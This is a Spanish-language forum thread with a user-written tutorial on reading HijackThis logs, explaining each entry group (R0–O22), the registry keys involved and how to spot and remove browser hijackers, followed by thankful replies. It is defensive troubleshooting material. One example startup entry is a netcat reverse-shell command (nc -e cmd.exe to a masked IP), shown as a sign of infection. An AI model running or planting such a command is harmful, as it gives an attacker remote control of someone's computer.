¿Cómo leer un log de Hijackthis?. Y corregir posibles problemas.

Iniciado por Zinc, 17 Noviembre 2007, 04:57 AM

0 Miembros y 1 Visitante están viendo este tema.

Zinc

Empecé este manual hace rato, pero por cuestiones personales y más que nada por falta de tiempo, no he podido terminarlo en mucho tiempo.
Aquí va, espero que sirva para todos.
ACLARACIÓN: Es mi primer manual, por lo que todas las críticas son bienvenidas.



¿Cómo leer un Log de Hijackhis?
Índice:
1. ¿Qué es Hijackthis y para qué nos sirve?
2. Instalación de Hijackthis y otras herramientas a utilizar.
3. Sacando nuestro Log.
4. Analizando logs.
5. Solucionando problemas.


1. ¿Qué es Hijackthis?
Es una pequeña herramienta que nos permite detectar y, eventualmente, eliminar las modificaciones hechas por Browsers hijackers tales como: "Toolbars, Páginas de Inicio, Páginas de búsqueda,capturadores de IE,etc.".
Cabe aclarar que no todo lo que nos muestra(Hijackthis) en el log es malo, por lo tanto hay que tener mucho cuidado con lo que borramos del log de Hijackthis.



2. Instalación y ejecución de Hijackthis.
Lo primero que debemos hacer, es bajarnos la nueva versión: HijackThis 2.0.2(u otra versión, funciona igual) lo podéis descargar de: Descargar.
Una vez descargado y con todos los programas cerrados procedemos a ejecutar la nueva instalación automatizada que no traían versiones anteriores.
Elegimos la ruta de instalación y aceptamos el contrato. Automáticamente se abrirá Hijackthis y se añadirá un icono de acceso directo en nuestro escritorio.
Después de esta secuencia de pasos, se verá una imagen así:



3. Sacando nuestro log de Hijackthis.
Como vemos en la imagen de más arriba, sólo nos queda hacer un paso más:
Hacer click en el botón: Do a system scan and save a logfile(que más o menos, significa: Escanear el sistema y guardar un archivo de log, que puede servir para publicarlo en algún foro o como copia de seguridad en otra situación).
Bueno, esperamos que se realice el escaneo del sistema y el hijackthis mostrará algo como esto:


A continuación analizaremos su salida.


4. Analizando el log de Hijackthis.
Procederé a detallar las componentes que conforman el log de Hijackthis y luego los explicaré brevemente.
Estos son:
R0, R1, R2, R3: las URL de paginas de inicio/búsqueda  en el Internet Explorer.

F0, F1, F2, F3: Programas cargados a partir de ficheros  *.ini (system.ini, win.ini)

N1, N2, N3, N4: las URL de paginas de inicio/búsqueda de Netscape o Firefox.

O1: Redirecciones mediante aviso del fichero HOSTS.

O2: BHO (Browser Help Object); Son plugins para aumentar la funcionalidad de Internet, pero también pueden ser spywares.

O3: Toolbars del IE. (Internet Explorer).

O4: Aplicaciones que cargan en el inicio automático de Windows, ya sea desde el registro o desde la carpeta Inicio.

O5: Son las opciones de IE no visibles desde el panel de control de Windows.

O6: Acceso restringido por el Administrador a las opciones de IE.

O7: Acceso restringido por el Administrador al Registro.

O8: Elementos encontrados en el menú contextual del IE.

O9: Botones adicionales que se encuentran en la barra de herramientas de IE. Ej. : Flasget, DAP, Encarta, etc.

O10: Winsock Hijackers.

O11: Adición de un grupo extra en las opciones avanzadas de IE.

O12: Plugins para IE.

O13: Hijack del prefijo en IE.

O14: Hijack de la configuración por defecto del IE.

O15: Sitios no autorizados en la zona segura configurada por IE.

O16: Objetos ActiveX.

O17: Hijack del Dominio / Lop.com

O18: Protocolos extra / Hijack de estos.

O19: Hijack de la hoja de estilo del Usuario

O20: Valores del registro auto ejecutables AppInit_DLLs.

O21: Llaves del registro auto ejecutables ShellServiceObjectDelayLoad.

O22: Llaves del registro auto ejecutables SharedTaskSheduler.

O23: Servicios.

Aquí, están detallados cada uno de los componentes. Ahora veremos, como podemos corregir algún problema a raíz de lectura de estos indicadores.

5. Solucionando problemas del sistema con Hijackthis.

Grupo de R0, R1, R2, R3.
En este caso, si las URL que aparecen aquí han sido configuradas por nosotros no habrá problema y las dejamos como están.
Pero, si estas no han sido puestas por nosotros, tienen direcciones muy extensas y no las conocemos la marcamos y damos a Fix Checked.

Ejemplo Bueno:
R0 - HKCU\Software\Microsoft\Internet Explorer\Main, Start Page = www.google.com.ar

Ejemplo Malo:
R1 - HKCU\Software\Microsoft\Internet Explorer\Main, Search Bar =  res://C:\WINDOWS\TEMP\se.dll/sp.html

NOTA: R2, ya no es utilizado.

Siguiendo con R3:
R3 es la referencia usada por Search Hook. Si introducimos manualmente una URL como pagina de inicio sin especificar un protocolo (http: //, ftp://) el navegador tratara de encontrar uno automático y en caso de que no lo logre, acudirá a URL Search Hook.

Ejemplo Bueno:
R3 - Default URLSearchHook is missing

Ejemplo Malo, marcar y dar a 'Fix Checked'
R3 - URLSearchHook: (no name) - _ {CFBFAE00-17A6-11D0-99CB-00C04FD64497} - (no file)


Grupo F0, F1, F2, F3.
Aquí encontramos programas cargados a partir de ficheros *.ini (win.ini, system.ini).

F0: Según las fuentes que he consultado es recomendable que si se encuentra una línea que comience con F0, marcarla y darle a continuación a Fix Checked.

F1: Programas antiguos utilizados por Win 3.1/95/98 que viene adjuntado en el archivo win.ini en las claves Run= y Load=. En este caso debemos buscar información antes de marcar y dar a Fix Checked.

F2 y F3: Son lo mismo que los anteriores, pero usan el núcleo NT, estoy hablando de Windows NT/2000/XP, que no usan del mismo modo a los archivos de inicio: system.ini y win.ini ya nombrados anteriormente.
Algunos ejemplos de referencia:
HKLM\Software\Microsoft\Windows NT\CurrentVersion\IniFileMapping
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit


HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit=[**]\system32\userinit.exe,[**]\moralla.exe


Si bajo Win NT encuentran el valor por defecto: userinit,nddeagnt.exe, es normal bajo ese sistema. Pero cualquier otro ejecutable es altamente probable que se trate de spyware y/o troyano.


Grupo N1, N2, N3, N4.

URL's de páginas de inicio/búsqueda en Netscape/Mozilla.

N1: Se refiere a la página de inicio y motor de búsqueda de Netscape 4
N2: Se refiere a la página de inicio y motor de búsqueda de netscape 6
N3: Se refiere a la página de inicio y motor de búsqueda de Netscape 7.
N4: Corresponde a la página de inicio y motor de búsqueda de Mozilla Firefox.

Se encuentran comúnmente en los archivos : prefs.js.

NOTA:
Actualmente el mayor porcentaje de spywares, malwares, Hijackers están hechos para IE y no para Mozilla,Netscape o Opera, por lo qué estos se mantienen un poco más a salvo que el IE mencionado anteriormente.


Grupo O1:
Corresponde al redireccionamiento del archivo Hosts.

Qué hace el archivo Hosts?.
El archivo Hosts, funciona como una especie de convertidor o el encargado de establecer las relaciones entre Dirección IP y Hostnames.

127.0.0.1 www.google.com

Si tratas de ir a www.google.com, revisará el archivo hosts, verá la entrada y la convertirá a la dirección IP 127.0.0.1.
En este cuadro, verás las rutas de instalación por defecto del archivo Hosts:

   
Si ves entradas como las mostradas arriba y no hay una razón específica por la cuál sepas que deban estar ahí, puedes borrarlas con seguridad.

Si ves que el archivo hosts está localizado en C:\Windows\Help\hosts, eso significa que estás infectado con el CoolWebSearch. Si notas que el archivo hosts no está en su ruta por defecto de tu sistema operativo entonces, en el escaneo de Hijackthis, marca la entrada y dale Fix Checked u otro programa que limpie el archivo Hosts.

Si no eres un usuario muy avanzado en Hijackthis y no quieres complicarte, puedes usar el programa Hoster, el cual permite restaurar el archivo hosts a su configuración por defecto en tu sistema.
Para hacer esto, baja el programa Hoster desde aquí : Descargar Hoster. Ejecútalo, una vez abierto, pulsa en el botón "Restore Original Host" y una vez hecho esto cierra el Hoster.


Grupo O2:
Este grupo, pertenece a los Browser Helper Objects ( BHO, para traducción, Google ).

Ejemplo de BHO Real:
BHO: NAV Helper - - C:\Program Files\Norton Antivirus\NavShExt.dll

Para arreglar este tipo de entradas, podemos consultar una lista como ésta, alojada en Sysinfo. Se puede consultar aquí: http://sysinfo.org/bholist.php

Cuando estemos consultando la lista, debemos hacer énfasis en el CLSID, que es el número entre las claves en la lista. El CLSID en el listado hacen referencias a entradas del registro que contienen información acerca de los BHO.

Una vez, detectadas las entradas malignas procederemos a marcarlas y darle "Fix Checked". Pero, en ese momento Hijackthis querrá cerrarlas al instante y no podrá hacerlo, ya que estarán en uso.
En este caso lo que deberemos hacer es entrar en modo Seguro con la tecla F8 antes que inicie el sistema y borrarlo manualmente.


Grupo O3:
Este grupo corresponde a las barras de herramientas de Internet Explorer.
Éstas son las famosas " Toolbars", que se encuentran debajo de la barra de navegación o el menú contextual de IE.

Éstas se encuentran en la siguiente llave del registro:
HKLM\SOFTWARE\Microsoft\Intenet Explorer\Toolbar

Ejemplo:
Toolbar: Norton Antivirus - - C:\Program Files\Norton Antivirus\NavShExt.dll

Si estas entradas, no están aceptadas por ti o no reconoces sus nombres puedes consultar la lista de Sysinfo que está en el grupo anterior, para encontrar la entrada y ver si sirve en tu sistema o no. Si es algo que no quieras en tu sistema, puedes borrarlo con tranquilidad, como antes lo hacíamos: Marcando la entrada y clic en Fix Checked.
En este grupo, sucede lo mismo que en el grupo anterior. Hijackthis intentará borrar las entradas seleccionadas pero no será posible borrar algunas, tendrás qué entrar en modo seguro para borrarlas manualmente.


Grupo O4:
A este grupo, le corresponde a los programas o aplicaciones que se inician con Windows cuando encendemos nuestro sistema.
Comúnmente se encuentran en las llaves del registro y las carpetas Inicio. Esto sólo es válido para NT, XP y 2000.

- Las llaves del registro, donde se pueden alojar estas aplicaciones son estas:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Run
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit


NOTA : HKLM = HKEY_LOCAL_MACHINE – HKCU = HKEY_CURRENT_USER.

Se pueden distinguir dos carpetas donde se pueden iniciar las aplicaciones:

Startup: C:\Documents and Settings\USERNAME\Start Menu\Programs\Startup -> Usuario en particular.
Global: C:\Documents and Settings\All Users\Start Menu\Programs\Startup - > Apunta a todos los usuarios.

Cuando arreglas las entradas O4, HijackThis no borrará los archivos asociados con esta entrada. Deberás borrarlos manualmente, usualmente reiniciando lo máquina y entrando en modo seguro. Las entradas Global Startup y Startup trabajan un poco diferente. HijackThis borrará los accesos directos en esas entradas, pero no los archivos a los que apuntan. Si un ejecutable actual reside en los directorios Global Startup o Startup entonces será borrado.

Ejemplo de aplicación legítima:
HKLM\...\Run: [winamp] "C:\Winamp\winamp.exe" / (puede ir algún argumento)

Posible ejemplo de aplicación maliciosa:
HKLM\...\Run : [**] "nc –vv 210.x.x.x –e cmd.exe"

Puedes consultar algunas de estas listas de Startups legítimos para poder consultar tu Log y ver si las aplicaciones que inician con tu sistema son verdaderas o en un peor caso: troyanos, spywares o hijackers.
Estas listas te pueden servir:
http://www.answersthatwork.com/Tasklist_pages/tasklist.htm
http://greatis.com/regrun3appdatabase.htm
http://www.sysinfo.org/startuplist.php
http://www.pacs-portal.co.uk/startup_content.php#THE_PROGRAMS
http://www.kephyr.com/filedb/index.php
http://www.liutilities.com/products/wintaskspro/processlibrary/


Grupo O5:
Este grupo corresponde a no poder acceder a las opciones de IE desde el Panel de Control.
Agregando una entrada dentro del archivo control.ini, que por defecto, se debería encontrar en "C:\Windows\control.ini". Modificando este archivo, podemos especificar los paneles de control que no deseemos que sean visibles.

Ejemplo: Archivo: control.ini: inet.cpl=no. Esto oculta las opciones de IE en el Panel de Control.

Si en el Log, encuentras una línea como esta y no esta puesta por ti o por otra persona de tu confianza o qué maneje el sistema, es signo de que una aplicación maliciosa esta intentando bloquear o dificultar la modificación de las opciones de IE. También puede ser una restricción puesta por algún software Anti-Spyware como SpyBot o Adware, en este último caso puedes dejarlo con tranquilidad, de lo contrario puedes utilizar Hijackthis para corregirlo.


Grupo O6:
Esta sección corresponde a una restricción, por parte del administrador, de hacer cambios en las opciones o en la página de inicio del Internet Explorer por medio de ciertas configuraciones en el registro.

Ejemplo :-
HKCU\Software\Policies\Microsoft\Internet Explorer\Restrictions

Estas opciones sólo son bloqueadas si el administrador lo ha hecho o por casualidado  o por uso personal se ha activado la función de Bloquear las opciones de IE desde el panel "Inmunizar" del software antispyware SpyBot: Search & Destroy.


Grupo 07:
Esta sección corresponde a que el Regedit no puede ser ejecutado debido al cambio de una entrada en el registro.

Llave del Registro: HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System

Ejemplo de Lista O7 - HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System:
DisableRegedit=1


NOTA: En algunos casos, los administradores de determinados lugares, como cyber, empresas u otros sitios, bloquean el acceso al regedit para que no se modifique alguna configuración. Pero al ver esto, en tu sistema y no fue puesto por tí, puedes usar Hijackthis para borrarlo con tranquilidad.


Grupo 08:
Este grupo corresponde a los objetos extras encontrados en el Menú Contextual del Internet Explorer.

Esto significa que verás las opciones que normalmente ves cuando das click derecho en alguna página web que estés viendo en tu navegador.

Llave del Registro: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\MenuExt


Ejemplo de Lista O8 - Extra context menu item: &Google Search -
res://c:\windows\GoogleToolbar1.dll/cmsearch.html


El listado para estas entradas mostrará los objetos que aparecen en el menú contextual cuando das click derecho, y qué programa es usado cuando das click en esa opción. Algunas, como "Browser Pal" deberían ser borradas siempre, y el resto deberías buscarlas en Google antes de hacer cualquier cosa. Un ejemplo de un programa legítimo que podríamos encontrar ahí sería la Google Toolbar.

Cuando arregles este tipo de entradas, HijackThis no borrará los archivos que vienen mencionados en la lista. Es recomendable que reinicies en modo seguro como en casos anteriores y borres esos archivos y/o carpetas de la toolbar mencionada.


Grupo 09:
Este grupo, corresponde a los botones que tenemos en la barra de herramientas principal del IE o a los objetos (ítems) en el menú Herramientas del IE que no son parte de la instalación por defecto.

Llave del Registro: HKLM\SOFTWARE\Microsoft\Internet Explorer\Extensiones

Ejemplo de la Lista O9 - Extra Button: AIM (HKLM)

Si no necesitas estos botones o los ítems del menú o los reconoces como malwares, puedes arreglarlas con seguridad.
Lo mismo que pasa en los grupos anteriores, Hijackthis no podrá borrar los archivos mencionados desde aquí, sino, qué tendrás que reiniciar y entrar en modo seguro para eliminar manualmente las carpetas y/o archivos maliciosos.


Grupo 10:
Este grupo, corresponde a los Hijackers del Winsock, también conocidos como LSP (Layered Service Provider). Los LSPs son una manera de unir un software a tu implementación Winsock 2 en tu computadora. Desde que los LSPs están encadenados, cuando el Winsock es usado, los datos también son transportados a través de cada LSP en la cadena. Los spywares y hijackers pueden usar los LSPs para ver todo el tráfico que se genera en tu conexión a Internet.

Ten cuidado, a la hora de remover estos objetos, ya qué si se eliminan de forma incorrecta, podrías perder el acceso a Internet.

Ejemplo de la Lista O10 - Broken Internet access because of LSP provider 'spsublsp.dll' missing
Muchos escaneadores de virus empiezan a escanear virus, troyanos, etc., al nivel del Winsock. El problema es que muchos de ellos no reordenan los LSPs en el orden correcto después de borrar el LSP problemático. Esto puede causar que HijackThis vea un problema y muestre una advertencia, la cuál puede ser similar al ejemplo de arriba, aunque de hecho el Internet sigue trabajando. Deberías consultar a un experto cuando arregles estos errores. También puedes usar LSPFix para arreglar esto.
El SpyBot por lo general,  puede arreglar esto pero asegúrate de que tienes la última versión, ya que las antiguas tienen problemas.
Si no eres, un usuario muy avanzado con Hijackthis puedes utilizar una herramienta para reparar estos errores llamada: LSPFix (Descargar).
Aquí pongo una lista, para poder verificar si estas entradas son legítimas o no:
http://www.angeltowns.com/members/zupe/lsps.html


Grupo 11:
Este grupo, corresponde a una grupo de opciones no por defecto que han sido agregadas en la pestaña de Opciones Avanzadas de Opciones de Internet en el Internet Explorer.

Si buscas por el menú de Herramientas >> Opciones de Internet verás la pestaña Opciones Avanzadas. Es posible que aparezca ahí un nuevo grupo de opciones agregando una entrada bajo una llave del registro.

LLave del Registro: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\AdvancedOptions

Ejemplo de la Lista O11 - Options group: [CommonName] CommonName

Esto lo saqué del manual que leí, cito textual: "De acuerdo con Merijn, creador de HijackThis (y también de CWShredder, StartupList, etc.), sólo se conoce de la existencia de un hijacker que usa esto y es el CommonName. Si ves CommonName en la lista, puedes removerlo con seguridad. Si ves otra entrada deberías usar Google para investigar un poco."


Grupo 12:
Este grupo, corresponde a los Plug-ins o addons para Internet Explorer. Los Plug-ins o addons son piezas de software que se cargan cuando el Internet Explorer inicia, para agregarle funcionabilidad al navegador. Existen muchos plug-ins legítimos y a su vez ilegítimos disponibles como por ejemplo el visor de archivos PDF(legítimo).

Llave del Registro: HKEY_LOCAL_MACHINE\software\microsoft\internet explorer\plugins

Ejemplo de la Lista O12: Plugin for .PDF: C:\Program Files\Internet Explorer\PLUGINS\nppdf32.dll


Muchos de los plug-ins son legítimos, así que deberías investigar con Google, antes de llegar a la conclusión de borrarlo.
Uno de los más conocidos plug-ins ilegítimos es el Onflow, que tiene extensión .OFB.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.


Grupo 13:
Este grupo, corresponde a un hijacker del prefijo por defecto del Internet Explorer. El prefijo por defecto es una configuración en Windows que especifíca como URLs aquello que escribas sin anteponer http://, ftp://, etc. que son manejados. Por defecto Windows agrega http:// al principio, como el prefijo por defecto. Es posible cambiar este prefijo por defecto por uno de tu elección editando el registro. El hijacker conocido como CoolWebSearch hace esto cambiando el prefijo por defecto a http://ehttp.cc/?. Eso significa que cuando te conectes a una URL, como www.google.com.mx, en realidad irás a http://ehttp.cc/?www.google.com.mx, el cuál es en realidad el sitio web para CoolWebSearch.

Llave del Registro:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\URL\DefaultPrefix\


Ejemplo de Lista O13 - WWW. Prefix: http://ehttp.cc/?


Si estás experimentando problemas similares al problema de arriba, deberías correr CWShredder. Este programa remueve todas las variaciones conocidas de CoolWebSearch que puedan estar en tu máquina.

Si CWShredder no encuentra o arregla el problema, entonces puedes usar el HijackThis para arreglar esta entrada cuando la encuentres.


Grupo O14

Este grupo, corresponde al hijacker del "Reset Web Settings" (Reseteo de las Configuraciones Web). Hay un fichero en tu computadora que usa IE(Internet Explorer) cuando reseteas las opciones a las que venían por defecto. Ese fichero está guardado por defecto en C:\Windows\inf\iereset.inf y contiene todas las configuraciones por defecto que serán usadas. Cuando reseteas una configuración, se leerá el fichero y cambiará las configuraciones que estén en el archivo. Si un hijacker cambia la información en ese fichero, entonces te estarás reinfectando cuando resetees las configuraciones, porque leerá la información incorrecta del fichero iereset.inf.

Ejemplo de Lista O14 - IERESET.INF: START_PAGE_URL=http://www.searchalot.com

En conclusión, si ves una entrada de este tipo en tu log, no siempre quiere decir que sea mala. Puede ser puesta por tí, algún administrador del equipo, lo debes dejar siempre y cuando, conozcas la dirección del archivo. Por el contrario, si la desconoses, puedes marcarla y darle Fix Checked.


Grupo O15.
Este grupo, corresponde con los sitios indeseados en la "Zona de Sitios de Confianza" de IE. La seguridad de Internet Explorer está basada en un conjunto de zonas. Cada zona tiene diferente nivel de seguridad en términos de scripts y aplicaciones que pueden corre mientras se está usando esa zona. Es posible agregar dominios a zonas particulares, así que si estás navegando en un dominio que es parte de una zona de baja seguridad, entonces permitirás que se ejecuten scripts, algunos potencialmente peligrosos, de algún sitio web.

Llave del Registro: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains

Ejemplo de Lista O15 - Trusted Zone: http://www.arwinianos.net

Entonces, si vemos alguna entrada que desconocemos su procedencia o URL, procederemos a marcarla y darle Fix Checked.


Grupo O16.
Este grupo, corresponde a los objetos ActiveX, también conocidos como Downloaded Program Files (Archivos de Programa Descargados).

Los objetos ActiveX son programas que son descargados desde sitios web y son guardados en tu ordenador. Estos objetos están guardados por defecto en: C:\windows\Downloaded Program Files. Estos tienen una referencia en el registro por su CLSID el cuál es una cadena larga de números entre llaves {}. Existen muchos controles ActiveX legítimos como este de ejemplo, el cuál es un visor iPix.

Ejemplo de Lista O16 - DPF: (iPix ActiveX Control) - http://www.ipix.com/download/ipixx.cab
O algún Activex, para jugar algún juego online.
Muchos son legítimos, pero también lo hay para ser usado con otras intenciones.

Si ves nombres o direcciones que no reconozcas, deberías buscar en Google para ver si son o no legítimos. Si confirmas que son ilegítimas, puedes arreglarlas. Borrando los objetos ActiveX de tu computadora, no tendrás mayor problema que descargarlos nuevamente cuando entres de nuevo a la página desde donde los descargaste.
Como ya dijimos más arriba, no todos los Activex, son ilegítimos. Muchos de estos son utilizados por sitios web autorizados que permiten acceder a ciertas funciones que no se permiten sin el objeto Activex.
Por ejemplo:
Cualquier AV online, como Eset, Kaspersky necesitan de un Activex para poder ejecutarse y ver el contenido de tus ficheros para poder analizarlos.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.


Grupo O17.
Este grupo corresponde al dominio Lop.com.

Cuando nos dirijimos a un sitio web usando un dominio, como www.hotmail.com, en lugar de una dirección IP, tu computadora usa un servidor DNS para transformar el nombre de dominio en una dirección IP parecida a 200.56.15.85. El hackeo de dominios sucede cuando el hijacker cambia los servidores DNS en tu máquina para poder apuntar tus DNS a donde ellos quieran para poder dirijirte a cualquier sitio que quieran. Agregando www.hotmail.com a sus servidores DNS, ellos pueden hacer que cuando vayas a www.hotmail.com, te redirijan al sitio de su elección, por ejemplo, un sitio que descargue más malware a tu ordenador o te infecte con algún troyano.

Ejemplo de Lista O17 - HKLM\System\CS1\Services\VxD\MSTCP: NameServer = 69.57.146.14,69.57.147.175

Si ves entradas de este tipo y no reconoces el dominio perteneciente a tu ISP o la compañía que te proporciona conexión a Internet, y los servidores DNS no pertenecen a tu ISP o compañía, entonces deberías usar HijackThis para arreglar esto.
En otro caso, podrías hacer un Whois a la dirección IP para ver a que compañía pertenecen.


Grupo O18.

Este grupo corresponde a los protocolos extra y protocolos de hijackers.

Este método es usado para cambiar los controladores de protocolo estándar que tu computadora usa a otros que el hijacker proporciona. Esto permite al hijacker tomar control de ciertos canales en que tu computadora envía y recibe información.

Llaves del Registro:
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter


HijackThis primero lee la sección de protocolos del registro en busca de protocolos no-estándar. Cuando encuentra uno muestra el CLSID para mayor información así como la ruta del archivo.

Ejemplo de Lista O18 - Protocol: relatedlinks - - C:\PROGRA~1\COMMON~1\MSIETS\msielink.dll


Los más comunes que hacen esto son CoolWebSearch, Related Links, y Lop.com. Si ves estos nombres puedes arreglarlos con HijackThis.
Usa Google para investigar si los archivos son legítimos. También puedes usar la Lista O18 de Castlecops como apoyo para verificar los archivos.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.


Grupo O19.
Este grupo corresponde al hijacker de las hojas de estilo del usuario.

Una hoja de estilo es una plantilla para saber cómo mostrar las capas, colores y fuentes que se visualizan en una página HTML. Este tipo de hijacking sobreescribe la hoja de estilo por defecto, la cuál fue diseñada para ayudar a los usuarios, y provoca largas cantidades de pop-ups (ventanas emergentes de publicidad) ya sea para causar SPAM, molestia o una lentitud potencial.

Llaves del Registro: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Styles\: User Stylesheets

Ejemplo de Lista O19 - User style sheet: c:\WINDOWS\Java\my.css

Por lo general, estas entradas se pueden reparar con Hijackthis sin mayores problemas.
Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso incluso si el Internet Explorer está cerrado. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.


Grupo O20.
Este grupo, corresponde a los archivos que se cargan a través del valor del registro AppInit_DLLs.

El valor del registro AppInitDLLs contiene una lista de dlls (librerías) que se cargarán cuando user32.dll está cargando. Muchos ejecutables de Windows usan la librería user32.dll, lo que significa que cualquier DLL que esté listada en la llave del registro AppInit_DLLs también será cargada. Esto hace que sea muy difícil remover la DLL ya que estará cargando con múltiples procesos, muchos de los cuales no pueden ser detenidos sin causar inestabilidad en el sistema. El archivo user32.dll también es usado en procesos que inician automáticamente por el sistema cuando tu te logueas. Esto significa que los archivos cargados en el valor AppInit_DLLs serán cargados casi al inicio en la rutina de arranque de Windows permitiendo a la DLL esconderse o protegerse a sí misma antes que tengamos acceso al sistema.

Este método es conocido al ser usado por una variante de CoolWebSearch y sólo puede verse en Regedit dando click derecho sobre el valor, y seleccionando Modificar dato binario. Registrar Lite , por otra parte, puede ver más fácil esta DLL.

Llave del Registro: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows

Ejemplo de Lista O20 - AppInit_DLLs: C:\WINDOWS\System32\winifhi.dll

Existen muy pocos programas legítimos que usan esta llave del registro, pero debes proceder con cuidado cuando decidas borrar los archivos que son listados aquí. Usa Google o alguna lista(Lista de Startups de Bleeping Computer) como soporte para investigar si los archivos son legítimos o no.
Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.


Grupo O21.
Este grupo, corresponde a los archivos que se cargan a través de la llave del registro ShellServiceObjectDelayLoad.

Esta llave contiene valores similares a los de la llave Run del registro. La diferencia es que ésa en lugar de apuntar al archivo mismo, ésta señala al InProcServer del CLSID, el cuál contiene la información acerca del DLL en particular que se está usando.

Los archivos bajo esta llave son cargados automáticamente por Explorer.exe cuando tu computadora inicia. Como Explorer.exe es la shell para tu computadora, ésta siempre se va a cargar, así también cargando los archivos bajo esta llave. Estos archivos son por lo tanto cargados tempranamente en el proceso de inicio antes de que ocurra cualquier intervención humana.

Un hijacker que usa el método puede reconocerse por las siguientes entradas:

Ejemplo de Lista: R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = C:\WINDOWS\secure.html
R1 - HKCU\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = C:\WINDOWS\secure.html


Llave del Registro: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad

Ejemplo de Lista O21 - SSODL: System - - C:\WINDOWS\system32\system32.dll

Hijackthis, tiene una base de datos interna que ya reconoce las aplicaciones legítimas y no las lista en el log, asique, cualquier entrada O21 que aparezca ya la puedes considerar sospechosa.
Puedes usar Google para consultar sobre esa DLL o esta lista de DLL's:
Lista de DLL's del grupo O21 de Bleeping Computer.

Cuando arregles este tipo de entradas con HijackThis, HijackThis querrá borrar el archivo listado. Hay ocasiones en que el archivo quizá esté en uso. Sí, el archivo todavía no se elimina, deberás entrar en modo seguro y eliminarlo de forma manual.


Grupo O22.
Este grupo, corresponde a los archivos que se cargan a través del valor del registro SharedTaskScheduler.
Las entradas en este registro se ejecutan automáticamente cuando inicias Windows. A la fecha sólo CWS.Smartfinder usa esta llave.

Llave del Registro: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\SharedTaskScheduler

Ejemplo de Lista O22 - SharedTaskScheduler: (no name) - - c:\windows\system32\mtwirl32.dll
Ojo! a la hora de borrar estas entradas, ya que algunas son legítimas.Puedes usar Google para buscar más información o ayudarte con esta lista:
Lista de Bleeping Computer O22.

HijackThis borrará el valor asociado del SharedTaskScheduler con esta entrada, pero no borrará el CLSID al que apunta ni el archivo al que apunta el Inprocserver32 de CLSID. Por lo que, como en los grupos anteriores, deberemos entrar en modo seguro y borrarlo manualmente con Unlocker u otro programa similar.



Aquí termina el manual, espero que sirva para todos.
Cito mi fuente para realizar este proyecto, también doy mis agradecimientos a ghastly y Ragnarok.
Cualquier sugerencia es más que bienvenida!.
Fuente de trabajo: http://www.bleepingcomputer.com/tutorials/tutorial81.html

Saludos.

leogtz

Extremadamente completo!!!

Muchisimas gracias, la verdad no sabia que querian decir los R0 y esas cosas,
esta muy bueno.
Código (perl) [Seleccionar]

(( 1 / 0 )) &> /dev/null || {
echo -e "stderrrrrrrrrrrrrrrrrrr";
}

http://leonardogtzr.wordpress.com/
leogutierrezramirez@gmail.com


rdzlcs

Hola amigo, muy buen trabajo completo y util  ;) mi primer trabajo fue como sacar la ip por fotolog un fracaso nunca pude poner bien las imagenes xD jejeje pero bueo con errores se hace la esperiencia..
Navegando en un mar de unos y ceros. Saltando de capa en capa por un modelo que lejos de ser seguro, nos da la libertad de Ser y No Ser.

vitaepe

Sencillamente impresionante muy buena informacion me quito el sombrero maestro!!  :o
Saludos!!  ;D

Pablo Videla

Muy buena info y muy completa , todo bien , muchas gracias nos servirá a todos  ;D

Jhoel Daron

A toda madre kamarada!! te diskutiste kon este tuto, la neta es que es de gran ayuda por q para muchos no es komplikado entender un log de HJT, gracias por tu aporte!!

~Yey~

simplemente genial ;)
es muy dificil lograr un manual de un tema tan complicado, completo y entendible a la vez
muchas gracias genial aporte



                                     Blog

cker

